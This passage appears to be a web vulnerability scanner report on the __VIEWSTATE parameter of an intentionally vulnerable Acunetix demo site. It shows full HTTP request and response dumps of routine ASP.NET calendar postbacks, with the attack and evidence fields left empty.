style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:White" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8582&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDA%2FhzGedsIZGRkU3%2BQPM%2BjDH7ZFg7PKVdM6YPvq3c%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtl%2FPxBwKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCqxWdtf4cjlS8z9SNJsflEIEp3zg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:03 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDA/hzGedsIZGRkU3+QPM+jDH7ZFg7PKVdM6YPvq3c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtl/PxBwKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCqxWdtf4cjlS8z9SNJsflEIEp3zg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:White" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8586&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDApcbqfNsIZGRkeT2Efoem8MK8EETl0ZgZITnafjU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLCkIOtDgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCtOvWUxeLSBMIBCitzCEWKEu5Ryw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:43 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDApcbqfNsIZGRkeT2Efoem8MK8EETl0ZgZITnafjU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLCkIOtDgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCtOvWUxeLSBMIBCitzCEWKEu5Ryw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table 